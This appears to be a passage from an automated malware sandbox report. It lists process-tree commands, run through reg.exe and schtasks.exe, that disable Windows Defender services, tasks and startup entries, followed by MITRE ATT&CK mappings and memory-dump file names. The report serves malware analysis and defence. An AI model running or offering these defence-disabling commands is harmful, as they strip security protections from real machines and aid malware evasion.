                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:2144
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:712
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:3012
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:752
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:760
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:3420
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:3624
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:4212
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:4272
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:4224
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:4256
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:4204

                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                            • memory/188-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/312-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/596-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/704-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/820-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/868-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/928-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1192-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1276-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1276-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1332-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1496-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1504-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1628-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1692-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1852-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/1868-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2072-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2092-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2132-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2132-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2172-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2200-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2216-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2300-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2360-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2456-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2484-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2624-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/2892-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3164-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3212-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3380-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3568-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3688-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3704-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3888-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3892-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/3984-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4052-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4152-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4184-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4196-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4216-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4248-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4280-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4316-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4356-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4392-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4444-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4480-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4536-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4584-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4632-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4672-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4704-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4772-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4808-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4848-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4920-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/4960-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/5004-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/5072-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                            • memory/5108-169-0x0000000000000000-mapping.dmp